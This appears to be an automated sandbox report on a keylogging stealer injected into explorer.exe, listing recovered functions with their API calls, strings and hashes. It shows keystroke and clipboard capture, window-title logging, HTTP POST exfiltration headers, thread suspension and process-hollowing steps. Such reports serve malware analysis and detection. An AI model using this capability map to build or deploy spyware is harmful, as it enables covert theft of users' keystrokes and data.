                                                                                                        • Opcode ID: add4b2080a038ef41e57dd6879f124ebc04e39f0b50e75b02ddb82f41d9f0b50
                                                                                                        • Instruction ID: e0f5582ec7b993d794935547184a4f619a4d6610014c2b9ea852b0b5868d4d03
                                                                                                        • Opcode Fuzzy Hash: add4b2080a038ef41e57dd6879f124ebc04e39f0b50e75b02ddb82f41d9f0b50
                                                                                                        • Instruction Fuzzy Hash: B3117CB1D4010CBFEB20DB94DC88EEEBBBCEB49788F1104A1FA04E2100D6384E189B30
                                                                                                        Function 02F2162B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetKeyboardState.USER32(?), ref: 02F21652
                                                                                                        • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 02F2167A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: KeyboardStateUnicode
                                                                                                        • String ID:
                                                                                                        • API String ID: 3453085656-3916222277
                                                                                                        • Opcode ID: cbb5c6cf815d7672ea8a1b5e00c956f5fb0a9398e32de499a9e46f6f09b33008
                                                                                                        • Instruction ID: 2e1311e14f276314dc67aafd85da29f7836d9c79f37f88de3ef4ff3953a316ae
                                                                                                        • Opcode Fuzzy Hash: cbb5c6cf815d7672ea8a1b5e00c956f5fb0a9398e32de499a9e46f6f09b33008
                                                                                                        • Instruction Fuzzy Hash: 9D01DB31D0022A5BDB34CA10D944BFFBB7CAF07784F094519DA09E6042D734D54D8FA9
                                                                                                        Function 02F213AE Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 144libraryloaderthreadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(02F25013,0000001C), ref: 02F213C8
                                                                                                        • VirtualQuery.KERNEL32(02F213AE,?,0000001C), ref: 02F213DA
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02F2140B
                                                                                                        • GetCurrentProcessId.KERNEL32(00000004), ref: 02F2141C
                                                                                                        • wsprintfA.USER32 ref: 02F21433
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02F21448
                                                                                                        • GetLastError.KERNEL32 ref: 02F2144E
                                                                                                        • RtlInitializeCriticalSection.NTDLL(02F2582C), ref: 02F21465
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 02F21489
                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 02F214A6
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02F214AF
                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 02F214D0
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02F214D3
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02F214F1
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 02F2150D
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02F21514
                                                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 02F2152A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                                                                        • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                                                                        • API String ID: 3628807430-1779906909
                                                                                                        • Opcode ID: d9dd51d6666bc0b2a4037c4a7f712a9914fea234965a30e915e15cb06f5e0f59
                                                                                                        • Instruction ID: c10d913ad602da081646da4ab390b6483ead4495ffbbab825e26fb5e083f7516
                                                                                                        • Opcode Fuzzy Hash: d9dd51d6666bc0b2a4037c4a7f712a9914fea234965a30e915e15cb06f5e0f59
                                                                                                        • Instruction Fuzzy Hash: 7E41C8B0E40329ABE720EF659C19E5B7B9DFB47BC47014458F60A86241CB79D41C8FB5
                                                                                                        Function 02F216B9 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 90stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • RtlEnterCriticalSection.NTDLL(02F2582C), ref: 02F216C4
                                                                                                        • lstrlenW.KERNEL32 ref: 02F216DB
                                                                                                        • lstrlenW.KERNEL32 ref: 02F216F3
                                                                                                        • wsprintfW.USER32 ref: 02F21743
                                                                                                        • GetForegroundWindow.USER32 ref: 02F2174E
                                                                                                        • GetWindowTextW.USER32(00000000,02F25850,00000800), ref: 02F21767
                                                                                                        • GetClassNameW.USER32(00000000,02F25850,00000800), ref: 02F21774
                                                                                                        • lstrcmpW.KERNEL32(02F25020,02F25850), ref: 02F21781
                                                                                                        • lstrcpyW.KERNEL32(02F25020,02F25850), ref: 02F2178D
                                                                                                        • wsprintfW.USER32 ref: 02F217AD
                                                                                                        • lstrcatW.KERNEL32 ref: 02F217C6
                                                                                                        • RtlLeaveCriticalSection.NTDLL(02F2582C), ref: 02F217D3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                                                                        • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                                                                        • API String ID: 2651329914-3371406555
                                                                                                        • Opcode ID: 234f1627b12c3d9fa38d2a2865e2838a42678c4eab2bfee196caa2cac6b9ce5c
                                                                                                        • Instruction ID: 9cd3e452afcb72924f7b8e91e2e80c0ef34830efe5650101a9295ea4dcd062d2
                                                                                                        • Opcode Fuzzy Hash: 234f1627b12c3d9fa38d2a2865e2838a42678c4eab2bfee196caa2cac6b9ce5c
                                                                                                        • Instruction Fuzzy Hash: 8521FB70E8023DABE7346B25EC84E6FBB59EB83FC47464454F60592112CB19882C97B5
                                                                                                        Function 02F225F1 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 02F22603
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02F2260B
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02F2261B
                                                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 02F22629
                                                                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02F22648
                                                                                                        • SuspendThread.KERNEL32(00000000), ref: 02F22658
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02F22667
                                                                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 02F22677
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02F22682
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 1467098526-0
                                                                                                        • Opcode ID: 244606904713e5764793a3e859737939c8a0d1b846610c1010d2305d269ec23c
                                                                                                        • Instruction ID: 04b0971ad0ef6d8be432bcf821a26f645235a17fff24483461752c4cb76b7b08
                                                                                                        • Opcode Fuzzy Hash: 244606904713e5764793a3e859737939c8a0d1b846610c1010d2305d269ec23c
                                                                                                        • Instruction Fuzzy Hash: B81194B2D45214EBD711DF60A448A6AFEA4EF46F89F010859FA4182144D338891C8FB7
                                                                                                        Function 02F220A1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 294 2f220a1-2f220fc call 2f2240f call 2f22a09 call 2f2298a call 2f224cc 303 2f22117-2f22123 294->303 304 2f220fe-2f22115 294->304 307 2f22127-2f22129 303->307 304->307 308 2f2212f-2f22166 RtlZeroMemory 307->308 309 2f223fd-2f2240c call 2f229eb 307->309 313 2f223f5-2f223fc 308->313 314 2f2216c-2f22187 308->314 313->309 315 2f221b9-2f221cb 314->315 316 2f22189-2f2219a call 2f2243d 314->316 321 2f221cf-2f221d1 315->321 322 2f2219c-2f221ab 316->322 323 2f221ad 316->323 324 2f223e2-2f223e8 321->324 325 2f221d7-2f22233 call 2f2288d 321->325 326 2f221af-2f221b7 322->326 323->326 329 2f223f1 324->329 330 2f223ea-2f223ec call 2f229eb 324->330 334 2f223db 325->334 335 2f22239-2f2223e 325->335 326->321 329->313 330->329 334->324 336 2f22240-2f22251 335->336 337 2f22258-2f22286 call 2f22a09 wsprintfW 335->337 336->337 340 2f22288-2f2228a 337->340 341 2f2229f-2f222b6 337->341 342 2f2228b-2f2228e 340->342 347 2f222f5-2f2230f 341->347 348 2f222b8-2f222ee call 2f22a09 wsprintfW 341->348 344 2f22290-2f22295 342->344 345 2f22299-2f2229b 342->345 344->342 346 2f22297 344->346 345->341 346->341 352 2f22315-2f22328 347->352 353 2f223b8-2f223ce call 2f229eb 347->353 348->347 352->353 357 2f2232e-2f22344 call 2f22a09 352->357 361 2f223d0-2f223d2 call 2f229eb 353->361 362 2f223d7 353->362 363 2f22346-2f22351 357->363 361->362 362->334 365 2f22353-2f22360 call 2f229ce 363->365 366 2f22365-2f2237c 363->366 365->366 370 2f22380-2f2238d 366->370 371 2f2237e 366->371 370->363 372 2f2238f-2f22393 370->372 371->370 373 2f22395 372->373 374 2f223ad-2f223b4 call 2f229eb 372->374 376 2f22395 call 2f229bd 373->376 374->353 378 2f2239a-2f223a7 RtlMoveMemory 376->378 378->374
                                                                                                        APIs
                                                                                                          • Part of subcall function 02F22A09: GetProcessHeap.KERNEL32(00000008,0000A000,02F210BF), ref: 02F22A0C
                                                                                                          • Part of subcall function 02F22A09: RtlAllocateHeap.NTDLL(00000000), ref: 02F22A13
                                                                                                          • Part of subcall function 02F2298A: lstrlen.KERNEL32(02F24FE2,?,00000000,00000000,02F220DD,74DE8A60,02F24FE2,00000000), ref: 02F22992
                                                                                                          • Part of subcall function 02F2298A: MultiByteToWideChar.KERNEL32(00000000,00000000,02F24FE2,00000001,00000000,00000000), ref: 02F229A4
                                                                                                          • Part of subcall function 02F224CC: RtlZeroMemory.NTDLL(?,00000018), ref: 02F224DE
                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 02F22139
                                                                                                        • wsprintfW.USER32 ref: 02F22272
                                                                                                        • wsprintfW.USER32 ref: 02F222DD
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02F223A7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                        • API String ID: 4204651544-1701262698
                                                                                                        • Opcode ID: 5dc8b0ed6ccae0eb978c79043b5e8f9c7fd86c37c486b4aa9b41648c48ad93a4
                                                                                                        • Instruction ID: 698f6c811181d1632f109621db59071fd2f0e4638fde0a078e9b776ffeb1157d
                                                                                                        • Opcode Fuzzy Hash: 5dc8b0ed6ccae0eb978c79043b5e8f9c7fd86c37c486b4aa9b41648c48ad93a4
                                                                                                        • Instruction Fuzzy Hash: 00A16471A043659FE3209F64D884A2BBBE9FF8A784F00082DFA85D7251DB74D908CB52
                                                                                                        Function 02F212AE Relevance: 7.6, APIs: 5, Instructions: 93stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 379 2f212ae-2f212bf 380 2f213a6-2f213ad 379->380 381 2f212c5-2f212c7 379->381 381->380 382 2f212cd-2f212cf 381->382 383 2f212d4 call 2f229bd 382->383 384 2f212d9-2f212fc lstrlen call 2f22a09 383->384 387 2f2136e-2f21377 call 2f229eb 384->387 388 2f212fe-2f21327 call 2f22841 RtlZeroMemory 384->388 393 2f21379-2f2137d 387->393 394 2f2139d-2f213a5 call 2f229ae 387->394 395 2f21353-2f21369 RtlMoveMemory call 2f22569 388->395 396 2f21329-2f2134f RtlMoveMemory call 2f22569 388->396 398 2f2137f-2f21392 call 2f2255c PathMatchSpecA 393->398 394->380 395->387 396->388 404 2f21351 396->404 406 2f21394-2f21397 398->406 407 2f2139b 398->407 404->387 406->398 408 2f21399 406->408 407->394 408->394
                                                                                                        APIs
                                                                                                          • Part of subcall function 02F229BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,02F212D9,00000000,00000000,?,00000001), ref: 02F229C7
                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 02F212DC
                                                                                                          • Part of subcall function 02F22A09: GetProcessHeap.KERNEL32(00000008,0000A000,02F210BF), ref: 02F22A0C
                                                                                                          • Part of subcall function 02F22A09: RtlAllocateHeap.NTDLL(00000000), ref: 02F22A13
                                                                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 02F2138A
                                                                                                          • Part of subcall function 02F22841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,02F21119,00000001), ref: 02F22850
                                                                                                          • Part of subcall function 02F22841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,02F21119,00000001), ref: 02F22855
                                                                                                        • RtlZeroMemory.NTDLL(00000000,00000104), ref: 02F21316
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02F21332
                                                                                                          • Part of subcall function 02F22569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,02F2136E), ref: 02F22591
                                                                                                          • Part of subcall function 02F22569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 02F2259A
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02F2135F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                                                                        • String ID:
                                                                                                        • API String ID: 2993730741-0
                                                                                                        • Opcode ID: 011a30443f6bafd7039ec70665b8c4e44126471eeff19b91a1f2c322e2d51bf8
                                                                                                        • Instruction ID: 712deb0bffcb98a48c165cc20f049276c73ec7d1c6b69c6b91d5b2b90fd99a91
                                                                                                        • Opcode Fuzzy Hash: 011a30443f6bafd7039ec70665b8c4e44126471eeff19b91a1f2c322e2d51bf8
                                                                                                        • Instruction Fuzzy Hash: 5A219170B042259F8714EE28895497FB7DBBB86784B10092EFE5AD3741DB34DC0D8B66
                                                                                                        Function 02F21581 Relevance: 7.6, APIs: 5, Instructions: 66stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 409 2f21581-2f21592 411 2f21624-2f21628 409->411 412 2f21598-2f2159b 409->412 413 2f215a7-2f215b3 GlobalLock 412->413 414 2f2159d-2f215a0 412->414 415 2f21623 413->415 416 2f215b5-2f215b9 413->416 414->413 417 2f215a2-2f215a5 414->417 415->411 418 2f215bb-2f215be 416->418 419 2f215e9 416->419 417->411 417->413 420 2f215c0-2f215c3 418->420 421 2f215e4-2f215e7 418->421 422 2f215eb-2f215f2 call 2f2293e 419->422 423 2f215f4-2f215fd call 2f22724 420->423 424 2f215c5-2f215e2 lstrlenW call 2f22a09 lstrcatW 420->424 421->422 422->423 431 2f2161b-2f21622 GlobalUnlock 423->431 432 2f215ff-2f21608 lstrlenW 423->432 424->423 431->415 432->431 433 2f2160a-2f2160e 432->433 434 2f2160f call 2f216b9 433->434 435 2f21614-2f21616 call 2f229eb 434->435 435->431
                                                                                                        APIs
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 02F215A9
                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 02F215C6
                                                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 02F215DC
                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 02F21600
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 02F2161C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Globallstrlen$LockUnlocklstrcat
                                                                                                        • String ID:
                                                                                                        • API String ID: 1114890469-0
                                                                                                        • Opcode ID: f325696f1b89ee3357500f3258558be2c7b7484728d50e31e75397941020eb15
                                                                                                        • Instruction ID: 6ea74a61bcfea301525efed5a0259d2d551c41727982eedbc83655e323df10b1
                                                                                                        • Opcode Fuzzy Hash: f325696f1b89ee3357500f3258558be2c7b7484728d50e31e75397941020eb15
                                                                                                        • Instruction Fuzzy Hash: 74014C72F0003557963466795D9467F769EDFC76D87090565EB0F93302DF388C0E8A58
                                                                                                        Function 02F21BBD Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 437 2f21bbd-2f21bd2 438 2f21c06-2f21c0e 437->438 439 2f21bd4 437->439 440 2f21c10-2f21c15 438->440 441 2f21c69-2f21c71 438->441 442 2f21bd6-2f21c04 RtlMoveMemory 439->442 443 2f21c64-2f21c67 440->443 444 2f21c73-2f21c85 441->444 445 2f21cb1 441->445 442->438 442->442 443->441 447 2f21c17-2f21c2a LoadLibraryA 443->447 444->445 448 2f21c87-2f21ca4 LdrProcessRelocationBlock 444->448 446 2f21cb3-2f21cb8 445->446 449 2f21c30-2f21c35 447->449 450 2f21cbb-2f21cbd 447->450 448->445 451 2f21ca6-2f21caa 448->451 453 2f21c5c-2f21c5f 449->453 450->446 451->445 452 2f21cac-2f21caf 451->452 452->445 452->448 454 2f21c61 453->454 455 2f21c37-2f21c3b 453->455 454->443 456 2f21c42-2f21c45 455->456 457 2f21c3d-2f21c40 455->457 458 2f21c47-2f21c51 GetProcAddress 456->458 457->458 458->450 459 2f21c53-2f21c59 458->459 459->453
                                                                                                        APIs
                                                                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 02F21BF4
                                                                                                        • LoadLibraryA.KERNEL32(?,02F25848,00000000,00000000,74DF2EE0,00000000,02F219B6,?,?,?,00000001,?,00000000), ref: 02F21C1C
                                                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 02F21C49
                                                                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02F21C9A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                        • String ID:
                                                                                                        • API String ID: 3827878703-0
                                                                                                        • Opcode ID: c832c686be9b0602faa407f1547560a2ee6623b696d5d983ff306ea64ea99361
                                                                                                        • Instruction ID: 3512ce6dd1db45444a51574ee48ab7b68535aab0f9e40b8cb17277bfe6202ca1
                                                                                                        • Opcode Fuzzy Hash: c832c686be9b0602faa407f1547560a2ee6623b696d5d983ff306ea64ea99361
                                                                                                        • Instruction Fuzzy Hash: FE31C975B40225AFCB28CF28C8947A7B798BF06388F05556CE949C7202D735E459D7A4
                                                                                                        Function 02F2182D Relevance: 6.0, APIs: 4, Instructions: 42sleepstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlEnterCriticalSection.NTDLL(02F2582C), ref: 02F21839
                                                                                                        • lstrlenW.KERNEL32 ref: 02F21845
                                                                                                        • RtlLeaveCriticalSection.NTDLL(02F2582C), ref: 02F218A9
                                                                                                        • Sleep.KERNEL32(00007530), ref: 02F218B4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2134730579-0
                                                                                                        • Opcode ID: 73971de96f3e0ab87d57eb597c680f9f75db5ff99119d67c993330c4892f23b7
                                                                                                        • Instruction ID: 5939211d9c223b4b9a1feedbfb209dd0a0cfcf63ede24156216b80b48d9dcbfb
                                                                                                        • Opcode Fuzzy Hash: 73971de96f3e0ab87d57eb597c680f9f75db5ff99119d67c993330c4892f23b7
                                                                                                        • Instruction Fuzzy Hash: 6601FC70D501259BD738E760DC58D6E7AAAEF43BC03014418E6058B240DA34891CDFB1
                                                                                                        Function 02F226C9 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,02F211DD), ref: 02F226DB
                                                                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 02F226ED
                                                                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 02F22700
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02F22716
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 331459951-0
                                                                                                        • Opcode ID: 2e097a6debc1f9691cf1c76b40d5a727e1eb7f27e1446c0dcfd7690f16301df5
                                                                                                        • Instruction ID: cfa37eee8eee9bab1d4a031ed28e8acdbed97ca75a1180efcc5e112c0be3b063
                                                                                                        • Opcode Fuzzy Hash: 2e097a6debc1f9691cf1c76b40d5a727e1eb7f27e1446c0dcfd7690f16301df5
                                                                                                        • Instruction Fuzzy Hash: 49F036B5D4612DFF9B20CF909D448AEF77CDF06699B14029AEA1493140D7355E0897B1
                                                                                                        Function 02F217DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 02F22A09: GetProcessHeap.KERNEL32(00000008,0000A000,02F210BF), ref: 02F22A0C
                                                                                                          • Part of subcall function 02F22A09: RtlAllocateHeap.NTDLL(00000000), ref: 02F22A13
                                                                                                        • GetLocalTime.KERNEL32(?,00000000), ref: 02F217F3
                                                                                                        • wsprintfW.USER32 ref: 02F2181D
                                                                                                        Strings
                                                                                                        • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 02F21817
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                        • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                                                        • API String ID: 377395780-613334611
                                                                                                        • Opcode ID: 0eeb21b26a5dc019f9f4b6452c4353713e0eaf95362905d62c2246f39d5d4c70
                                                                                                        • Instruction ID: a28218a7ca8b6bfcf1937e17f1c318317e9586f436526088e83805af581f9c28
                                                                                                        • Opcode Fuzzy Hash: 0eeb21b26a5dc019f9f4b6452c4353713e0eaf95362905d62c2246f39d5d4c70
                                                                                                        • Instruction Fuzzy Hash: EEF030A2D00138BA9724ABD99D059FFB3FCEB0DB42B00058AFA41E1180E67C5A64D7B5

                                                                                                        Callgraph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        • Opacity -> Relevance
                                                                                                        • Disassembly available
                                                                                                        callgraph 0 Function_00EE156C 1 Function_00EE1C6C 2 Function_00EEADEA 3 Function_00EEB46A 4 Function_00EEA8E8 5 Function_00EE2768 49 Function_00EE27A0 5->49 6 Function_00EE18E8 7 Function_00EE3068 7->1 11 Function_00EE1860 7->11 43 Function_00EE2E2C 7->43 54 Function_00EE1938 7->54 55 Function_00EE1838 7->55 8 Function_00EEC0E9 9 Function_00EE2664 10 Function_00EEAFE3 11->1 12 Function_00EE1560 13 Function_00EE1EFA 14 Function_00EE1EF8 15 Function_00EE26F8 15->1 15->9 74 Function_00EE2580 15->74 16 Function_00EE18F8 17 Function_00EE1BF8 18 Function_00EE14F9 19 Function_00EE5579 20 Function_00EEAFF6 21 Function_00EE1576 22 Function_00EE20F4 22->11 22->16 31 Function_00EE1FDC 22->31 40 Function_00EE18D0 22->40 42 Function_00EE20AC 22->42 51 Function_00EE19BC 22->51 22->55 60 Function_00EE188C 22->60 61 Function_00EE1F0C 22->61 23 Function_00EEABCF 24 Function_00EE1C4C 25 Function_00EEB148 26 Function_00EE4048 27 Function_00EE34C4 27->1 27->11 27->17 27->24 41 Function_00EE1CAC 27->41 47 Function_00EE1D24 27->47 27->51 27->55 64 Function_00EE1A88 27->64 67 Function_00EE1D04 27->67 68 Function_00EE2A04 27->68 83 Function_00EE3394 27->83 28 Function_00EE27C4 29 Function_00EE2DC0 29->55 30 Function_00EEB2DF 31->16 31->55 32 Function_00EEB15B 33 Function_00EEB358 45 Function_00EEB4A8 33->45 34 Function_00EE3158 35 Function_00EEABD7 36 Function_00EE1254 37 Function_00EE14D4 38 Function_00EE1D54 39 Function_00EEAAD2 42->64 43->11 43->29 43->60 44 Function_00EE31AC 44->11 44->15 44->38 46 Function_00EE25A8 44->46 44->55 84 Function_00EE1B10 44->84 45->3 46->5 46->40 46->74 48 Function_00EE1822 50 Function_00EEB2BE 50->45 52 Function_00EE2FBC 52->43 53 Function_00EE24B8 53->11 53->22 53->55 54->11 54->55 56 Function_00EE14B2 57 Function_00EE4233 58 Function_00EEAAB0 59 Function_00EE370C 59->1 59->27 59->44 59->55 59->59 60->55 62 Function_00EEAC8D 63 Function_00EE1508 65 Function_00EE5289 66 Function_00EEB007 68->1 68->28 80 Function_00EE2918 68->80 69 Function_00EE1405 70 Function_00EE4203 71 Function_00EE1F00 72 Function_00EEAD00 73 Function_00EE1000 75 Function_00EEA881 76 Function_00EEAB9C 77 Function_00EE1E9C 78 Function_00EE1E1C 78->55 79 Function_00EE141D 81 Function_00EE4817 82 Function_00EE2D14 82->6 82->11 82->53 82->55 82->78 83->6 83->11 83->14 83->40 83->55 83->64 83->77 85 Function_00EEB291

                                                                                                        Executed Functions

                                                                                                        Function 00EE370C Relevance: 1.6, APIs: 1, Instructions: 75nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 116 ee370c-ee371c call ee1c6c 119 ee3722-ee3754 call ee1838 116->119 120 ee37b0-ee37b5 116->120 124 ee3756-ee375b call ee1838 119->124 125 ee3785-ee37aa NtUnmapViewOfSection 119->125 128 ee3760-ee3779 124->128 129 ee37bc-ee37cb call ee34c4 125->129 130 ee37ac-ee37ae 125->130 128->125 136 ee37cd-ee37d0 call ee370c 129->136 137 ee37d5-ee37de 129->137 130->120 131 ee37b6-ee37bb call ee31ac 130->131 131->129 136->137
                                                                                                        APIs
                                                                                                        • NtUnmapViewOfSection.NTDLL ref: 00EE378C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000014.00000002.4174152479.0000000000EE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00EE1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
